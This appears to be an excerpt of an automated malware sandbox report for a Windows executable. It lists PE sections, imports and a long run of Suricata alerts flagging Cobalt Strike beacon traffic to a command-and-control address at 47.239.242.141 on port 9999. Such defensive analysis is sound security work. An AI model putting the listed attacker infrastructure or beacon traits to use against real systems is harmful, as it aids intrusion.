.data	0x3000	0x46c	0x600	7eb479a7f8d3141b428394315c884632	False	0.5852864583333334	dBase III DBT, version number 0, next free block index 10, 1st item "\003N\354\237\030X\226\335J\034\247\301WW\367\201\023C\342\355l1\207\226\030=\214\372p5\221\341j(\353\242)x\266RR\022\351`\250\330Vo\362\330\007o\237\203{\035x\3771cx\272\004\027\303\003\272\003\002\225\014\367\301"W\277;\214}}\257b\232\036\22633\227\203'\002I8\003u<\010@\345\373U\220\234\314m\203f\344P\311\344\267\027\024\234\333\266\271w\364`\247\033\027\201.&"	5.512928665203427	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x4000	0x634	0x800	4ede6ab348f58ec93db32b686ea2150d	False	0.22705078125	data	4.491892856844257	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x5000	0x428	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6000	0x644	0x800	aadf1540ca9e4739dbb53c18577a8e0f	False	0.3486328125	data	3.945174785557075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x7000	0x34	0x200	a09a5f5fb4593e99cd0076e5f2fcec2e	False	0.072265625	Matlab v4 mat-file (little endian) \200\031@, numeric, rows 4198688, columns 0	0.2711142780062829	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x8000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile

msvcrt.dll

__getmainargs, __initenv, __lconv_init, __p__acmdln, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _initterm, _iob, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T04:19:04.968088+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49731	47.239.242.141	9999	TCP
2024-10-08T04:19:05.972057+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49732	47.239.242.141	9999	TCP
2024-10-08T04:19:06.998484+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49733	47.239.242.141	9999	TCP
2024-10-08T04:19:08.053189+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49734	47.239.242.141	9999	TCP
2024-10-08T04:19:09.108824+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49735	47.239.242.141	9999	TCP
2024-10-08T04:19:10.121197+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49736	47.239.242.141	9999	TCP
2024-10-08T04:19:11.127428+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49737	47.239.242.141	9999	TCP
2024-10-08T04:19:12.179763+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49738	47.239.242.141	9999	TCP
2024-10-08T04:19:13.204933+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49739	47.239.242.141	9999	TCP
2024-10-08T04:19:14.236431+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49740	47.239.242.141	9999	TCP
2024-10-08T04:19:15.280380+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49741	47.239.242.141	9999	TCP
2024-10-08T04:19:16.312929+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49742	47.239.242.141	9999	TCP
2024-10-08T04:19:17.340971+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49743	47.239.242.141	9999	TCP
2024-10-08T04:19:18.389586+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49744	47.239.242.141	9999	TCP
2024-10-08T04:19:19.415869+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49746	47.239.242.141	9999	TCP
2024-10-08T04:19:20.459124+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49750	47.239.242.141	9999	TCP
2024-10-08T04:19:21.516151+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	49752	47.239.242.141	9999	TCP
2024-10-08T04:19:22.527862+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57241	47.239.242.141	9999	TCP
2024-10-08T04:19:23.611069+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57242	47.239.242.141	9999	TCP
2024-10-08T04:19:24.657533+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57243	47.239.242.141	9999	TCP
2024-10-08T04:19:25.698644+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57244	47.239.242.141	9999	TCP
2024-10-08T04:19:26.867039+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57245	47.239.242.141	9999	TCP
2024-10-08T04:19:27.898211+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57246	47.239.242.141	9999	TCP
2024-10-08T04:19:28.940254+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57247	47.239.242.141	9999	TCP
2024-10-08T04:19:29.987916+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57248	47.239.242.141	9999	TCP
2024-10-08T04:19:31.005395+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57249	47.239.242.141	9999	TCP
2024-10-08T04:19:32.006805+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57250	47.239.242.141	9999	TCP
2024-10-08T04:19:33.047421+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57251	47.239.242.141	9999	TCP
2024-10-08T04:19:34.088439+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57252	47.239.242.141	9999	TCP
2024-10-08T04:19:35.109959+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57253	47.239.242.141	9999	TCP
2024-10-08T04:19:36.140969+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57254	47.239.242.141	9999	TCP
2024-10-08T04:19:37.156592+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57255	47.239.242.141	9999	TCP
2024-10-08T04:19:38.202974+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57256	47.239.242.141	9999	TCP
2024-10-08T04:19:39.233093+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57257	47.239.242.141	9999	TCP
2024-10-08T04:19:40.274977+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57258	47.239.242.141	9999	TCP
2024-10-08T04:19:41.305449+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57259	47.239.242.141	9999	TCP
2024-10-08T04:19:42.327506+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57260	47.239.242.141	9999	TCP
2024-10-08T04:19:43.399661+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57261	47.239.242.141	9999	TCP
2024-10-08T04:19:44.409634+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57262	47.239.242.141	9999	TCP
2024-10-08T04:19:45.456892+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57263	47.239.242.141	9999	TCP
2024-10-08T04:19:46.457545+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57264	47.239.242.141	9999	TCP
2024-10-08T04:19:47.476754+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	57265	47.239.242.141	9999	TCP
2024-10-08T04:19:48.500123+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54000	47.239.242.141	9999	TCP
2024-10-08T04:19:49.531755+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54001	47.239.242.141	9999	TCP
2024-10-08T04:19:50.589170+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54002	47.239.242.141	9999	TCP
2024-10-08T04:19:51.620832+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54003	47.239.242.141	9999	TCP
2024-10-08T04:19:52.660561+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54004	47.239.242.141	9999	TCP
2024-10-08T04:19:53.691905+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54005	47.239.242.141	9999	TCP
2024-10-08T04:19:54.732434+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54006	47.239.242.141	9999	TCP
2024-10-08T04:19:55.886326+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54007	47.239.242.141	9999	TCP
2024-10-08T04:19:56.918012+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54008	47.239.242.141	9999	TCP
2024-10-08T04:19:57.940654+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54009	47.239.242.141	9999	TCP
2024-10-08T04:19:58.943230+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54011	47.239.242.141	9999	TCP
2024-10-08T04:19:59.951013+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54012	47.239.242.141	9999	TCP
2024-10-08T04:20:01.004859+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54022	47.239.242.141	9999	TCP
2024-10-08T04:20:02.013597+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54029	47.239.242.141	9999	TCP
2024-10-08T04:20:03.043271+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54035	47.239.242.141	9999	TCP
2024-10-08T04:20:04.062120+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54046	47.239.242.141	9999	TCP
2024-10-08T04:20:05.105700+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54052	47.239.242.141	9999	TCP
2024-10-08T04:20:06.144595+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54058	47.239.242.141	9999	TCP
2024-10-08T04:20:07.187408+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54067	47.239.242.141	9999	TCP
2024-10-08T04:20:08.438710+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54075	47.239.242.141	9999	TCP
2024-10-08T04:20:09.488923+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54076	47.239.242.141	9999	TCP
2024-10-08T04:20:10.501748+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54087	47.239.242.141	9999	TCP
2024-10-08T04:20:11.547390+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54093	47.239.242.141	9999	TCP
2024-10-08T04:20:12.550985+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54099	47.239.242.141	9999	TCP
2024-10-08T04:20:13.596335+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54110	47.239.242.141	9999	TCP
2024-10-08T04:20:14.642143+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54116	47.239.242.141	9999	TCP
2024-10-08T04:20:15.650787+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54123	47.239.242.141	9999	TCP
2024-10-08T04:20:16.697041+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54132	47.239.242.141	9999	TCP
2024-10-08T04:20:17.715528+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54137	47.239.242.141	9999	TCP
2024-10-08T04:20:18.743830+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54141	47.239.242.141	9999	TCP
2024-10-08T04:20:19.807840+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54147	47.239.242.141	9999	TCP
2024-10-08T04:20:20.837022+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54151	47.239.242.141	9999	TCP
2024-10-08T04:20:21.896606+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54157	47.239.242.141	9999	TCP
2024-10-08T04:20:22.942607+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54167	47.239.242.141	9999	TCP
2024-10-08T04:20:23.970751+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54174	47.239.242.141	9999	TCP
2024-10-08T04:20:25.002018+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54180	47.239.242.141	9999	TCP
2024-10-08T04:20:26.025783+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54190	47.239.242.141	9999	TCP
2024-10-08T04:20:27.038896+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54197	47.239.242.141	9999	TCP
2024-10-08T04:20:28.096113+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54203	47.239.242.141	9999	TCP
2024-10-08T04:20:29.113685+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54209	47.239.242.141	9999	TCP
2024-10-08T04:20:30.151408+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54220	47.239.242.141	9999	TCP
2024-10-08T04:20:31.172357+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54226	47.239.242.141	9999	TCP
2024-10-08T04:20:33.033516+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54235	47.239.242.141	9999	TCP
2024-10-08T04:20:34.066251+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54241	47.239.242.141	9999	TCP
2024-10-08T04:20:35.119688+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54249	47.239.242.141	9999	TCP
2024-10-08T04:20:36.157631+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54255	47.239.242.141	9999	TCP
2024-10-08T04:20:37.249000+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54264	47.239.242.141	9999	TCP
2024-10-08T04:20:38.252660+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54271	47.239.242.141	9999	TCP
2024-10-08T04:20:39.286417+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54278	47.239.242.141	9999	TCP
2024-10-08T04:20:40.310462+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54287	47.239.242.141	9999	TCP
2024-10-08T04:20:41.338962+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54295	47.239.242.141	9999	TCP
2024-10-08T04:20:42.353769+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54301	47.239.242.141	9999	TCP
2024-10-08T04:20:43.404768+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54310	47.239.242.141	9999	TCP
2024-10-08T04:20:44.438145+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54318	47.239.242.141	9999	TCP
2024-10-08T04:20:45.498910+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54319	47.239.242.141	9999	TCP
2024-10-08T04:20:46.553987+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54320	47.239.242.141	9999	TCP
2024-10-08T04:20:47.566853+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54321	47.239.242.141	9999	TCP
2024-10-08T04:20:48.571227+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54322	47.239.242.141	9999	TCP
2024-10-08T04:20:49.617059+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54323	47.239.242.141	9999	TCP
2024-10-08T04:20:50.690784+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54324	47.239.242.141	9999	TCP
2024-10-08T04:20:51.704868+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54325	47.239.242.141	9999	TCP
2024-10-08T04:20:52.709000+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54326	47.239.242.141	9999	TCP
2024-10-08T04:20:53.737040+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54327	47.239.242.141	9999	TCP
2024-10-08T04:20:54.761899+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54328	47.239.242.141	9999	TCP
2024-10-08T04:20:55.800991+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54329	47.239.242.141	9999	TCP
2024-10-08T04:20:57.012911+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54330	47.239.242.141	9999	TCP
2024-10-08T04:20:58.043260+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54331	47.239.242.141	9999	TCP
2024-10-08T04:20:59.053608+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54332	47.239.242.141	9999	TCP
2024-10-08T04:21:00.072083+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54333	47.239.242.141	9999	TCP
2024-10-08T04:21:01.117037+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54334	47.239.242.141	9999	TCP
2024-10-08T04:21:02.144689+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54335	47.239.242.141	9999	TCP
2024-10-08T04:21:03.188730+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54336	47.239.242.141	9999	TCP
2024-10-08T04:21:04.204429+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54337	47.239.242.141	9999	TCP
2024-10-08T04:21:05.214067+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54338	47.239.242.141	9999	TCP
2024-10-08T04:21:06.269961+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54339	47.239.242.141	9999	TCP
2024-10-08T04:21:07.377059+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54340	47.239.242.141	9999	TCP
2024-10-08T04:21:08.433504+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54341	47.239.242.141	9999	TCP
2024-10-08T04:21:09.477067+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54342	47.239.242.141	9999	TCP
2024-10-08T04:21:10.516090+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54343	47.239.242.141	9999	TCP
2024-10-08T04:21:11.516757+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54344	47.239.242.141	9999	TCP
2024-10-08T04:21:12.546302+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54345	47.239.242.141	9999	TCP
2024-10-08T04:21:13.561153+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54346	47.239.242.141	9999	TCP
2024-10-08T04:21:14.570458+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54347	47.239.242.141	9999	TCP
2024-10-08T04:21:15.589155+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54348	47.239.242.141	9999	TCP
2024-10-08T04:21:16.631106+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54349	47.239.242.141	9999	TCP
2024-10-08T04:21:17.666947+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54350	47.239.242.141	9999	TCP
2024-10-08T04:21:18.680858+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54351	47.239.242.141	9999	TCP
2024-10-08T04:21:19.725667+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54352	47.239.242.141	9999	TCP
2024-10-08T04:21:20.756202+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54353	47.239.242.141	9999	TCP
2024-10-08T04:21:21.787557+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54354	47.239.242.141	9999	TCP
2024-10-08T04:21:22.846257+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54355	47.239.242.141	9999	TCP
2024-10-08T04:21:23.867551+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54356	47.239.242.141	9999	TCP
2024-10-08T04:21:24.917082+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54357	47.239.242.141	9999	TCP
2024-10-08T04:21:26.602794+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54358	47.239.242.141	9999	TCP
2024-10-08T04:21:27.626953+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54359	47.239.242.141	9999	TCP
2024-10-08T04:21:28.650140+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54360	47.239.242.141	9999	TCP
2024-10-08T04:21:29.718196+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54361	47.239.242.141	9999	TCP
2024-10-08T04:21:30.764581+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54362	47.239.242.141	9999	TCP
2024-10-08T04:21:31.774660+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54363	47.239.242.141	9999	TCP
2024-10-08T04:21:32.819362+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54364	47.239.242.141	9999	TCP
2024-10-08T04:21:33.867686+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54365	47.239.242.141	9999	TCP
2024-10-08T04:21:34.921388+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54366	47.239.242.141	9999	TCP
2024-10-08T04:21:35.935395+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54367	47.239.242.141	9999	TCP
2024-10-08T04:21:36.953439+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54368	47.239.242.141	9999	TCP
2024-10-08T04:21:38.005590+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54369	47.239.242.141	9999	TCP
2024-10-08T04:21:39.031494+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54370	47.239.242.141	9999	TCP
2024-10-08T04:21:40.068358+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54371	47.239.242.141	9999	TCP
2024-10-08T04:21:41.181692+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54372	47.239.242.141	9999	TCP
2024-10-08T04:21:42.206300+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54373	47.239.242.141	9999	TCP
2024-10-08T04:21:43.259608+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54374	47.239.242.141	9999	TCP
2024-10-08T04:21:44.295192+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54375	47.239.242.141	9999	TCP
2024-10-08T04:21:45.471588+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54376	47.239.242.141	9999	TCP
2024-10-08T04:21:46.530326+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54377	47.239.242.141	9999	TCP
2024-10-08T04:21:47.565211+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54378	47.239.242.141	9999	TCP
2024-10-08T04:21:48.591692+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54379	47.239.242.141	9999	TCP
2024-10-08T04:21:49.601653+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54380	47.239.242.141	9999	TCP
2024-10-08T04:21:50.679123+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54381	47.239.242.141	9999	TCP
2024-10-08T04:21:51.703527+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54382	47.239.242.141	9999	TCP
2024-10-08T04:21:52.750530+0200	2033713	ET MALWARE Cobalt Strike Beacon Observed	1	192.168.2.4	54383	47.239.242.141	9999	TCP
